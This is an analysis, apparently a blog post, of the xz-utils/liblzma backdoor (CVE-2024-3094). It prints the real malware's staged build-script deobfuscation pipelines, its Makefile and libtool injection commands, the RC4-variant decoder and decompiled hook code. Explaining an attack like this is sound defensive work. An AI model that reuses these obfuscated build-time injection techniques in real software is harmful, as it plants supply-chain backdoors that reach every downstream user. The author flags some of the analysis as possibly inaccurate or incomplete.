Dissecting the xz-utils Backdoor

An attempt at making sense of the xz/liblzma backdoor (CVE-2024-3094), or 2024's hardest CTF challenge

Cover Illustration by cloudnienty

On March 29th, 2024, a critical backdoor (CVE-2024-3094) was discovered in the widely-used xz/liblzma package, a tool and library for working with LZMA-compressed files. The backdoor was discovered by a Microsoft engineer who noticed that his SSH logins were taking about 500 ms longer than usual (which is pretty rad ngl, 10x engineer type shit).

While many have publicly called this an OpenSSH authentication bypass, it is actually a more complex remote code execution attack, with the payload separated into four stages, all of them significantly obfuscated.

This post might contain inaccurate or incomplete analysis, as this is a developing situation with many in the industry still trying to make sense of the entire mess. This article also uses some research tidbits and references from the following articles:

Pre-Exploit Activity

The GitHub user responsible, who uses the alias Jia Tan, seems to have worked tirelessly for more than two years to obscure his activity, social engineering his way into a position to backdoor the repo. But while his [TBA]

Disabling of Linux Landlock

It seems the threat actor also disabled a security feature in the xz repository by making subtle changes to a script used to check for Landlock support. Landlock is a Linux security module that allows applying strict rules to limit the system calls and filesystem access of user processes, enhancing security through sandboxing.

In the diff, the following changes are made:

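  1. Adding a stray dot (.) next to the my_sandbox function definition (line 8), which introduces a syntax error in the C test program and prevents it from compiling. Because the check only reports Landlock as available when the test program compiles, the feature is silently left disabled.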

  2. Changing the letter 'C' in "LINUX_LANDLOCK" to a Cyrillic 'C' (line 25 and line 27), which creates a subtle difference in the string that can bypass string comparison checks
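To make the homoglyph trick in the second item concrete, here is a minimal Python sketch. It assumes the swapped character is U+0421 (Cyrillic capital "Es"), and the helper name find_non_ascii is made up for this illustration; it is not taken from the xz repository.

```python
import unicodedata

# Assumption: the look-alike letter is U+0421, CYRILLIC CAPITAL LETTER ES.
latin = "LINUX_LANDLOCK"
spoofed = "LINUX_LANDLO\u0421K"

def find_non_ascii(text):
    """Return (index, character name) for every non-ASCII character."""
    return [(i, unicodedata.name(ch)) for i, ch in enumerate(text) if ord(ch) > 127]

# The two strings render almost identically but never compare equal.
print(latin == spoofed)
print(find_non_ascii(spoofed))
```

A scan like this is one cheap way to flag identifiers that look right to a reviewer but differ at the byte level.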

The Landlock bypass affects the xz component, not the liblzma component, so it's possible that it was made in preparation for a separate payload that was still under construction.

Initial Backdoor Component in Upstream Branch

We can see in the git commit history that the initial component of the backdoor's build process, build-to-host.m4, is excluded from the main branch through .gitignore.

Instead, the file shows up in the upstream release version tracked in the debian/unstable branch.

While GitHub automatically generates a tarball from the git tag, maintainers also have the option to upload additional files alongside the automatic ones. This functionality is a double-edged sword.

On one hand, it allows maintainers to include necessary generated files that are not part of the git repository, such as configuration scripts. On the other hand, it opens the door to potential misuse if someone with access adds files that are not part of the official source.

Automatically generated archives might not be sufficient for complex projects and one of the solutions might be the use of git tag checkout. However, such changes would complicate the build and packaging processes, particularly for distributions like Debian, which often use patches and require additional files that aren't part of the upstream source.


Obfuscation Routine

Stage 1 : build-to-host.m4

The exploit starts with this build-to-host file, which is an Autoconf macro file used to handle file name translations between the build environment and the target runtime environment. This is necessary when the build environment (e.g., the system where the software is being compiled) is different from the target runtime environment (e.g., the system where the compiled software will be executed).

The code has a very interesting tidbit, especially around the definition of somedir_c_make on Line 63:

dnl Define somedir_c_make.
[$1]_c_make=`printf '%s\n' "$[$1]_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
dnl Use the substituted somedir variable, when possible, so that the user
dnl may adjust somedir a posteriori when there are no special characters.
 if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
   [$1]_c_make='\"$([$1])\"'
 fi
 if test "x$gl_am_configmake" != "x"; then
   gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
 else
   gl_[$1]_config=''
 fi
 _LT_TAGDECL([], [gl_path_map], [2])dnl
 _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
 _LT_TAGDECL([], [gl_am_configmake], [2])dnl
 _LT_TAGDECL([], [[$1]_c_make], [2])dnl
 _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
 AC_SUBST([$1_c_make])

The gl_[$1]_config variable is defined with a command that performs data extraction and obfuscation removal on a file specified by $gl_am_configmake. It reads the file's contents using sed, appends a newline character, and pipes the output to eval with the $gl_path_map variable, which contains a tr command that performs character substitutions (likely to "uncorrupt" obfuscated data). The resulting output is then piped to a command specified by $gl_[$1]_prefix with the -d option, presumably for decompression or decoding. Any errors from this final command are suppressed by redirecting them to /dev/null. This process is designed to extract and execute a hidden, obfuscated script from the tests/files/bad-3-corrupt_lzma2.xz file during the build process.

gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
gl_path_map='tr "\t \-_" " \t_\-"'

The gl_path_map definition above, found on Line 95 of the file, is the next part of the exploit: it acts as the translation step that un-obfuscates the bad-3-corrupt_lzma2.xz payload.
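The effect of that tr command is easy to reproduce. The following is a minimal Python sketch of the same byte swap (tab with space, hyphen with underscore); the names PATH_MAP and apply_path_map are illustrative and do not appear in the backdoor.

```python
# Python equivalent of: tr "\t \-_" " \t_\-"
# Assumption: helper names are made up for this illustration.
PATH_MAP = bytes.maketrans(b"\t -_", b" \t_-")

def apply_path_map(data: bytes) -> bytes:
    """Swap tab<->space and '-'<->'_', leaving every other byte untouched."""
    return data.translate(PATH_MAP)

sample = b"a\tb c-d_e"
print(apply_path_map(sample))
```

Because the mapping only swaps pairs, applying it twice returns the original bytes, which is why the same table works for both "corrupting" and "uncorrupting" the test file.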


Stage 2 : bad-3-corrupt_lzma2.xz

After the deobfuscating routine is completed, we get the following bash file. This seems to be another deobfuscation routine.

# retrieve the 'srcdir' path from config.status or a parent's config.status
if test -f config.status; then
    eval $(grep ^srcdir= config.status)
elif test -f ../../config.status; then
    eval $(grep ^srcdir= ../../config.status)
    srcdir="../../$srcdir"
fi

# export a command sequence to variable 'i' for later evaluation
export i="(\
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +2048 && \
(head -c +1024 > /dev/null) && head -c +724 \
)"

# process a compressed file, apply transformations, decompress, and execute as shell commands
(
    xz -dc "$srcdir/tests/files/good-large_compressed.lzma" | \
    eval $i | \
    tail -c +31265 | \
    tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" \
) | xz -F raw --lzma1 -dc | /bin/sh

The script begins by evaluating the contents of the config.status file to extract the value of the srcdir variable, which likely represents the project's source directory. This step is essential for locating the required files and directories during the deobfuscation process.

eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi

The next step is to define a variable i holding a command string that performs selective byte extraction from a data stream once it is run through eval. The string is a long chain of head commands that alternately skip and output bytes from the input.

export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && ... && head -c +724)"

The chain starts by skipping the first 1024 bytes (head -c +1024 >/dev/null), then outputs the next 2048 bytes (head -c +2048). This pattern repeats, alternating between skipping 1024 bytes and outputting 2048 bytes. The final head command outputs either 724 or 939 bytes, depending on the script version.
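The skip-then-keep pattern can be sketched in a few lines of Python. This is only a model of the head chain: the function name skip_and_take and its parameters are assumptions made for illustration, and the demo uses tiny sizes rather than the real 1024/2048 values.

```python
import io

def skip_and_take(stream, rounds, skip, take, last_take):
    """Model the head chain: discard `skip` bytes, keep `take` bytes, repeat.

    The final round keeps `last_take` bytes instead of `take`.
    """
    out = bytearray()
    for n in range(rounds):
        stream.read(skip)                      # (head -c +skip > /dev/null)
        size = last_take if n == rounds - 1 else take
        out += stream.read(size)               # head -c +size
    return bytes(out)

# Tiny demo: skip 2, keep 3, then skip 2, keep 1.
demo = skip_and_take(io.BytesIO(b"abcdefghij"), rounds=2, skip=2, take=3, last_take=1)
print(demo)
```

With the real values (skip=1024, take=2048) the junk bytes interleaved with the payload are dropped, which is what makes the test file look like random corrupt data until it is filtered.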

The main deobfuscation process is encapsulated in the following command, which ends by piping the decompressed and deobfuscated data to the system's shell (/bin/sh) for execution:

(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh

The script decompresses the tests/files/good-large_compressed.lzma file using xz -dc. The decompressed output is piped to eval $i, which runs the previously defined head chain and keeps only selected byte ranges of the stream. That output is piped to tail -c +31265, which skips the first 31,264 bytes (or 31,232 bytes, depending on the version).

The remaining data is then passed through a tr command that applies a byte-for-byte substitution cipher, mapping the ranges in "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" onto "\0-\377". Finally, the result is decompressed as a raw LZMA1 stream by xz -F raw --lzma1 -dc.
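To see that this tr invocation is a plain substitution table, the octal ranges can be expanded by hand. The sketch below does that in Python; the names expand, SET1 and TABLE are illustrative, and only the range values come from the command above.

```python
def expand(ranges):
    """Expand inclusive (low, high) byte ranges the way tr expands 'a-b'."""
    out = bytearray()
    for low, high in ranges:
        out += bytes(range(low, high + 1))
    return bytes(out)

# First tr argument: "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"
SET1 = expand([(0o5, 0o51), (0o204, 0o377), (0o52, 0o115),
               (0o132, 0o203), (0o0, 0o4), (0o116, 0o131)])
# Second tr argument: "\0-\377"
SET2 = bytes(range(256))

# SET1 covers every byte value exactly once, so the table is a permutation.
TABLE = bytes.maketrans(SET1, SET2)

print(len(SET1), bytes([0o5, 0o204]).translate(TABLE))
```

Since the six ranges together cover all 256 byte values exactly once, no information is lost; the step only scrambles the bytes so that the embedded LZMA stream is not recognizable in the test file.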

The resulting file is the next piece of the code, and one of the beefier sections of the exploit outside of the main payload.


Stage 3 : good-large_compressed.lzma

The final shell script, extracted from good-large_compressed.lzma, is significantly more complex than the previous ones, but in the end it's just another layer of deobfuscation with additional checks.

The script starts by performing a series of checks to ensure that the environment meets specific conditions.

if test -f config.status; then
    eval $zrKcSS
    eval `grep ^LD=\'\/ config.status`
    eval `grep ^CC=\' config.status`
    eval `grep ^GCC=\' config.status`
    eval `grep ^srcdir=\' config.status`
    eval `grep ^build=\'x86_64 config.status`
    eval `grep ^enable_shared=\'yes\' config.status`
    eval `grep ^enable_static=\' config.status`
    eval `grep ^gl_path_map=\' config.status`
    eval $zrKccj
    # ... (more checks follow)
fi

The code first checks for the existence of the config.status file, and then reads the specific values of various variables (e.g., LD, CC, GCC, srcdir, build, enable_shared, enable_static, gl_path_map) from the config.status file.

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64"; then
    eval $zrKcst
    # ... (more checks follow)
fi

The code then checks if either the debian/rules file exists in the source directory ($srcdir) or if the RPM_ARCH variable is set to x86_64. This means that the target system must be x86-64, and the compilation process must be part of a Debian or RPM package build.

if (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then
    eval $zrKcKQ
    # ... (more checks follow)
fi

If the conditions are met and the script is running in the context of a Debian or RPM package build, it modifies the src/liblzma/Makefile file.

b="am__test = $U"  # U is the 'bad-3-corrupt_lzma2.xz' file
sed -i "/$j/i$b" src/liblzma/Makefile || true

# inject additional rules and variables
h="-Wl,--sort-section=name,-X"
if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
    h=$h",-z,now"
fi
j="liblzma_la_LDFLAGS += $h"
sed -i "/$L/i$j" src/liblzma/Makefile || true

These modifications include:

  • Adding a reference to a corrupted test file (bad-3-corrupt_lzma2.xz) as a dependency

  • Injecting additional build rules and variables related to linker flags, object file dependencies, and environment variable exports

  • Modifying the linker flags to include options like -z,now (disabling lazy binding) and -Wl,--sort-section=name,-X (sorting sections by name and discarding temporary local symbols).

The script also modifies the libtool script by replacing a specific pattern (^pic_flag=\" -fPIC -DPIC\"$) with a custom compilation flag (-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections).

sed -i "s/$O/$C/g" libtool || true
# O="^pic_flag=\" -fPIC -DPIC\"$"
# C="pic_flag=\" $P\"" (where P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections")

If the script detects the presence of specific object files (liblzma_la-crc64_fast.o and liblzma_la-crc32_fast.o), it performs additional checks and then generates new versions of these object files. This process involves retrieving a compressed payload from the good-large_compressed.lzma file and then decompressing and decoding the payload using a modified version of RC4.

# Decompress the input file using xz
xz -dc $top_srcdir/tests/files/$p |

# Apply the head chain stored in $i to keep only selected byte ranges
eval $i |

# Convert each character to a separate line
LC_ALL=C sed "s/\(.\)/\1\n/g" |

# Implement a modified RC4 algorithm
LC_ALL=C awk '
BEGIN {
    # Set the field separator to newline and record separator to newline
    FS="\n"; RS="\n"; ORS=""

    # Initialize variables
    m = 256 # Modulus value
    for (i = 0; i < m; i++) {
        t[sprintf("x%c", i)] = i # Create a lookup table for characters
        c[i] = ((i * 7) + 5) % m # Initialize the state array
    }
    i = 0; j = 0

    # "Drop" RC4, discarding 4096 bytes of keystream
    for (l = 0; l < 4096; l++) {
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        c[i] = c[j]
        c[j] = a
    }
}

# Decoding loop
{
    # Lookup the character value (an empty record stands for a newline byte)
    v = t["x" (NF < 1 ? RS : $1)]

    # Generate one keystream byte
    i = (i + 1) % m
    a = c[i]
    j = (j + a) % m
    b = c[j]
    c[i] = b
    c[j] = a
    k = c[(a + b) % m]

    # Apply the keystream with addition modulo 256
    printf "%c", (v + k) % m
}' |

# Decompress the output again using xz
xz -dc --single-stream |

# Truncate the output to the desired length
((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true

The script starts by decompressing the input file with xz -dc, which writes the decompressed data to standard output. The data is then filtered through eval $i, where $i is the head chain defined in the previous stage, so only selected byte ranges survive.

The output of the eval command is piped to sed, which appends a newline after every character using the s/\(.\)/\1\n/g command, so that each byte lands on its own line. This prepares the data for the next stage, an awk script that implements a modified RC4 algorithm to decode the obfuscated data.

The BEGIN block initializes variables and prepares the RC4 state array. It creates a lookup table t to map characters to their corresponding byte values, and fills the state array c with the fixed affine sequence (7i + 5) mod 256 instead of running RC4's usual key schedule.

The for loop inside the BEGIN block "drops" the first 4096 bytes of the RC4 keystream by running 4096 iterations of the state update and discarding the output.

The main decoding loop looks up the byte value of the current character in the t lookup table and generates one keystream byte using the RC4 state update. It then applies the keystream byte with addition modulo 256 instead of the usual XOR and prints the decoded character to standard output.

The decoded output from the awk script is piped back to xz with the -dc --single-stream options, which decompresses the data again. Finally, the script uses head to skip the first $N bytes and keep the next $W bytes, and redirects the result to the file liblzma_la-crc64-fast.o.
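For readers who find the awk hard to follow, here is a rough Python port of the same cipher. It is a sketch based only on the listing above: the names keystream and decode mirror the awk logic, while encode is a hypothetical inverse added purely so the round trip can be checked.

```python
def keystream():
    """Yield keystream bytes of the RC4 variant shown in the awk listing."""
    m = 256
    c = [(i * 7 + 5) % m for i in range(m)]   # fixed state, no key schedule
    i = j = 0
    for _ in range(4096):                     # drop the first 4096 outputs
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        c[i], c[j] = c[j], a
    while True:
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        b = c[j]
        c[i], c[j] = b, a
        yield c[(a + b) % m]

def decode(data: bytes) -> bytes:
    """Apply the keystream with addition modulo 256, as the awk script does."""
    return bytes((v + k) % 256 for v, k in zip(data, keystream()))

def encode(data: bytes) -> bytes:
    """Hypothetical inverse (subtraction), not part of the backdoor scripts."""
    return bytes((v - k) % 256 for v, k in zip(data, keystream()))

message = b"liblzma payload"
print(decode(encode(message)) == message)
```

Because there is no secret key, anyone holding the script can decode the payload; the cipher serves as obfuscation rather than encryption.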

xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk '...' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
# decompresses and decodes the payload from 'good-large_compressed.lzma'

sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \
sed "/include \"crc_x86_clmul.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c -  $P -o .libs/liblzma_la-crc64_fast.o 2>/dev/null
# prepends a header, appends custom code, and compiles the modified crc64_fast.c

The $V variable contains the injected malicious code. Specifically, the script replaces the calls to the original is_arch_extension_supported() function in the crc64_fast.c and crc32_fast.c files with calls to the malicious _is_arch_extension_supported() function.

The is_arch_extension_supported() function is supposed to check if the CPU supports certain architecture extensions needed for optimized CRC computation. The xz-utils library contains optimized CRC implementations that take advantage of CPU-specific instructions like the CLMUL instruction set on x86 CPUs. The is_arch_extension_supported() function is used to dynamically determine if the optimized CRC implementations can be used or if the generic (non-optimized) implementations should be used instead.

if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then
    if test ! -f .libs/liblzma.so; then
        mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
        mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
    fi
    rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true
else
    mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
    mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi

After modifying the crc64_fast.c source, the script compiles it together with the previously extracted liblzma_la-crc64-fast.o file. The resulting object file (.libs/liblzma_la-crc64_fast.o) is then used to rebuild the liblzma library, which is the next level of the malware.


The Backdoor : liblzma_la-crc64-fast.o

A .o file is an object file: compiled machine code plus metadata (symbols and relocations) produced by the compiler. It's not directly executable; object files need to be linked together to create an executable binary or a shared library.

The script from good-large_compressed.lzma folds liblzma_la-crc64-fast.o into the rebuilt CRC object and then links it into a shared library (liblzma.so) using the linker command:

$AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD

The Payload

The malicious code in these object files gets incorporated into the final shared library, liblzma. While OpenSSH itself doesn't use liblzma, many Linux distributions patch sshd to link against libsystemd, which in turn depends on liblzma.

As explained earlier, the rebuild of liblzma compiles the modified crc64_fast.c source together with liblzma_la-crc64-fast.o. The key addition is the modified _is_arch_extension_supported() function, which calls the external _get_cpuid() function. This function is not part of the xz-utils codebase; instead, it is provided by a malicious object file that the script injects into the build process.

Below is the original is_arch_extension_supported() function from the crc_x86_clmul.h header file.

static inline bool
is_arch_extension_supported(void)
{
    uint32_t eax, ebx, ecx, edx;

    /* Check if CPU supports CLMUL instruction set */
    __get_cpuid(1, &eax, &ebx, &ecx, &edx);
    return (ecx & (1 << 1)) && (ecx & (1 << 9));
}

The malicious script replaces this function with a custom _is_arch_extension_supported() function that calls the injected _get_cpuid() function instead:

extern int _get_cpuid(int, void*, void*, void*, void*, void*);

static inline bool _is_arch_extension_supported(void) {
    int success = 1; 
    uint32_t r[4];
    success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16);
    const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);
    return success && (r[2] & ecx_mask) == ecx_mask;
}

Compared to the original function, it calls the malicious _get_cpuid() function instead of GCC's __get_cpuid() helper. It checks for an additional CPU feature flag (bit 19 of the ecx register) along with the CLMUL flags, but because _get_cpuid() is provided by the malicious binary, it acts as the hook into backdooring sshd.

is_arch_extension_supported calls __get_cpuid (provided by GCC), but the backdoored build script modifies crc64_fast.c so it calls _get_cpuid instead, which is responsible for carrying out the primary malicious actions of the backdoor. One of the key malicious actions performed by _get_cpuid() is the modification of the Global Offset Table (GOT) and Procedure Linkage Table (PLT) of the process that loads the library.

The _get_cpuid() function is executed when the dynamic linker runs liblzma's ifunc resolvers at process startup, allowing it to modify the GOT and PLT to hijack the RSA_public_decrypt() function. This is achieved by exploiting the GNU indirect function (ifunc) mechanism, which allows for dynamic resolution of function implementations at runtime based on certain conditions, such as CPU capabilities.

The reason the backdoor hijacks the ifunc resolver is because ifunc resolvers are executed very early during program startup, before the GOT and PLT are marked read-only for security reasons. By intercepting the ifunc resolver and injecting the malicious _get_cpuid() function, the backdoor can modify the GOT and PLT while they are still writable, allowing the hijacking of RSA_public_decrypt().

__int64 __fastcall sub_A710(unsigned int a1, __int64 a2, __int64 a3, __int64 a4)
{
    __int64 v4; // r9
    unsigned int v6; // [rsp+14h] [rbp-4Ch] BYREF
    char v7[4]; // [rsp+18h] [rbp-48h] BYREF
    char v8[4]; // [rsp+1Ch] [rbp-44h] BYREF
    __int64 v9[8]; // [rsp+20h] [rbp-40h] BYREF

    v4 = 0LL;
    if ( dword_CF48 == 1 )
    {
        v9[0] = 1LL;
        memset(&v9[1], 0, 32);
        v9[5] = a2;
        Llzma_block_param_encoder_0(v9, a2, a3, a4, v9, 0LL);
        v4 = a2;
    }
    ++dword_CF48;
    cpuid(a1, &v6, v7, v8, v9, v4);
    return v6;
}

The Llzma_index_prealloc_0() function is where the hijacking of the RSA_public_decrypt() function's GOT (Global Offset Table) entry takes place. The code first checks if the Llzma12_coder_1 variable is not null, and then proceeds to retrieve the address of the original RSA_public_decrypt() function.

__int64 __fastcall Llzma_index_prealloc_0(unsigned int a1, __int64 a2, __int64 a3,  __int64 a4, __int32 a5)
{
    __int64 (__fastcall **v4)(_QWORD, __int64, __int64, __int64); // rax
    __int64 (__fastcall *v5)(_QWORD, __int64, __int64, __int64); // r14
    __int64 result; // rax
    __int64 v8; // [rsp+0h] [rbp-48h]
    int v9[11]; // [rsp+1Ch] [rbp-2Ch] BYREF

    if ( !Llzma12_coder_1 )
        return 0LL;
    v4 = *(__int64 (__fastcall ***)(_QWORD, __int64, __int64, __int64))(Llzma12_coder_1 + 8);
    if ( !v4 )
        return 0LL;
    v5 = *v4;
    if ( !*v4 )
        return 0LL;
    if ( !a4 )
        return v5(a1, a2, a3, a4);
    v8 = a4;
    v9[0] = 1;
    result = Llzma_index_stream_size_1(a4, Llzma12_coder_1, v9);
    a4 = v8;
    if ( v9[0] )
        return v5(a1, a2, a3, a4);
    return result;
}

The hook verifies a signature carried in the attacker's payload against a hardcoded Ed448 public key. When verification succeeds, it executes the attacker's command through the system() function; otherwise, it just continues on to the original function. Because the hook sits on RSA_public_decrypt, a function originally used for validating RSA signatures, the code can tamper with SSH's authentication mechanism. The hook code examines the RSA public modulus, and this modulus is completely controlled by the attacker connecting to the SSH server.

When logging into the impacted machine using the attacker's SSH certificate, the attack payload is extracted from the public key, then further verified, and finally decrypted using the ChaCha20 symmetric stream cipher, and the decrypted data is executed as a command. The ChaCha20 key is the first 32 bytes of the Ed448 public key:

0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48

The decrypted data contains a 114-byte signature, which is verified against the following Ed448 public key:

0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
10 0c b0 6c 3a be 14 ee 89 55 d2 45 00 c7 7f 6e
20 d3 2c 60 2b 2c 6d 31 00

The decrypted payload string is then executed as a shell command by passing it directly to system() (through a fake allocator mechanism that will be discussed in the next section), but only if the signature is confirmed as valid; otherwise, the code passes execution back to the original function.

__int64 __fastcall Llzma_delta_decoder_init_part_0(_QWORD *a1)
{
    __int64 result; // rax
    result = 5LL;
    if ( a1 )
    {
        a1[7] = &Lfilter_options_0;
        result = 0LL;
        if ( !a1[6] )
        {
            a1[13] = 4LL;
            a1[8] = sub_28C0;
            a1[9] = Llzma_index_prealloc_0;
            a1[10] = Llzma12_mode_map_part_1;
            a1[11] = Lfile_info_decode_0;
            a1[14] = Lbt_skip_func_part_0;
            a1[15] = 101LL;
        }
    }
    return result;
}

The public key is known, but only the attackers have the corresponding Ed448 private signing key, which means the backdoor can only be used by the attackers. The signature is also bound to the host's public key, meaning that a valid signature can't be reused on a different host.


Stealthy Anti-Forensic Tricks

The code tries very hard (harder than most malware) to remain hidden. If the level of sophistication in the obfuscation and backdoor delivery stages of the malware hasn't convinced you that this is a state-backed actor, then the lengths it goes to hide its activities might.

The liblzma library provides a memory allocation layer that forwards allocation and deallocation requests to dedicated allocator objects. When calling lzma_alloc or lzma_free, the library essentially invokes the corresponding function pointers within the provided allocator object.

The malware implements a fake allocator by abusing the lzma_alloc function from the liblzma library. Instead of performing memory allocation, this fake allocator is designed to look up symbol addresses based on string IDs. When lzma_alloc is called with a string ID as the size argument, the fake allocator interprets it as a request to resolve the corresponding symbol. The string IDs used by the malware are divisible by 8 and fall within the range of 0x10 to 0xd10, making them appear like plausible size values at first glance.

The fake allocator object is returned by a function named .Lstream_decoder_memconfig.part.1. This allocator structure contains a context pointer, which is passed to the allocation and deallocation functions. In the case of the fake allocator, the opaque member of the allocator structure is used to store a pointer to internal ELF module descriptor records, providing additional context for symbol resolution.

The usage pattern of the fake allocator can be summarized as follows: First, the GetFakeAllocator function is called to obtain a pointer to the fake allocator object. Next, the opaque member of the allocator is set to point to the ELF module descriptor for the desired library (e.g., libc). Then, lzma_alloc is called with a string ID representing the symbol to be resolved (e.g., 0xAB8 for setresuid). The returned pointer represents the resolved symbol address, which can be used or stored by the malware as needed.

This allocator is used to resolve and call system(), effectively hiding these calls from static analysis. The lzma_alloc function is typically used for memory allocation purposes within the liblzma library. However, the malware hijacks this function and repurposes it as an import resolution mechanism. The malware achieves this by implementing a custom lzma_allocator structure and providing it to the lzma_alloc function.

The lzma_allocator structure has three fields: alloc, free, and opaque. The malware sets the alloc field to point to the Linit_pric_table_part_1 function, and the free field to Lstream_decode_1. However, the true purpose of these functions is not memory allocation/deallocation; instead, they serve as wrappers for resolving and calling imported functions.

system_func = lzma_alloc(STR_system_, lzma_allocator);
ctx->system = system_func;
if (system_func)
    ++ctx->num_imports;

In this code snippet, STR_system_ is the numeric string ID that stands for the "system" function name. The fake allocator behind lzma_alloc treats it as a request to resolve the system() import and returns the corresponding function address, which is then stored in system_func.
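The idea of an allocator that resolves symbols instead of allocating memory can be modeled in a few lines. The Python sketch below is a toy model, not the backdoor's implementation: the symbol table, the addresses, and the names Allocator, fake_alloc and fake_free are all hypothetical. Only the three string IDs (0x308, 0x878, 0xAB8) and the alloc(opaque, nmemb, size) calling convention come from the text and from liblzma's allocator interface.

```python
from dataclasses import dataclass
from typing import Any, Callable, Optional

# String IDs mentioned in this article; the real table is much larger.
STRING_IDS = {0x308: "read", 0x878: "__errno_location", 0xAB8: "setresuid"}

@dataclass
class Allocator:
    """Toy stand-in for lzma_allocator: alloc, free, opaque."""
    alloc: Callable[[Any, int, int], Optional[int]]
    free: Callable[[Any, Any], None]
    opaque: Any = None

def fake_alloc(opaque, nmemb, size):
    """Treat `size` as a string ID and resolve it in the module in `opaque`."""
    name = STRING_IDS.get(size)
    return opaque.get(name) if name else None

def fake_free(opaque, ptr):
    """Placeholder; the real counterpart is not modeled here."""
    return None

def lzma_alloc(size, allocator):
    """liblzma forwards the request to allocator.alloc(opaque, 1, size)."""
    return allocator.alloc(allocator.opaque, 1, size)

# Hypothetical "ELF module descriptor": symbol name -> made-up address.
libc = {"read": 0x7F0000001000, "__errno_location": 0x7F0000002000}

allocator = Allocator(alloc=fake_alloc, free=fake_free)
allocator.opaque = libc                      # mirrors the store at offset 0x10
fn_read = lzma_alloc(0x308, allocator)
print(hex(fn_read))
```

To a static analysis tool the call site looks like an ordinary allocation of 0x308 bytes, which is the point of the disguise.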

ulong _Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, undefined *elf_info, ctx *ctx)
{
    long lzma_allocator;
    ulong uVar1;
    void *fn_read;
    void *fn___errno_location;

    // Get the address of the custom lzma_allocator
    lzma_allocator = get_lzma_allocator(1);

    // Parse the ELF file and store information in elf_info
    uVar1 = parse_elf(*p_elf, elf_info);

    // If the ELF parsing was successful
    if ((int)uVar1 != 0) {
        // Store the parsed elf_info in the opaque field of lzma_allocator
        *(undefined **)(lzma_allocator + 0x10) = elf_info;

        // Resolve the "read" import using lzma_alloc
        fn_read = (void *)lzma_alloc(0x308, lzma_allocator);
        ctx->fn_read = fn_read;
        if (fn_read != (void *)0x0) {
            ctx->num_imports++;
        }

        // Resolve the "__errno_location" import using lzma_alloc
        fn___errno_location = (void *)lzma_alloc(0x878, lzma_allocator);
        ctx->__errno_location = fn___errno_location;
        if (fn___errno_location != (void *)0x0) {
            ctx->num_imports++;
        }

        // Set uVar1 to 1 if both imports were resolved successfully
        uVar1 = (ulong)(ctx->num_imports == 2);
    }

    return uVar1;
}

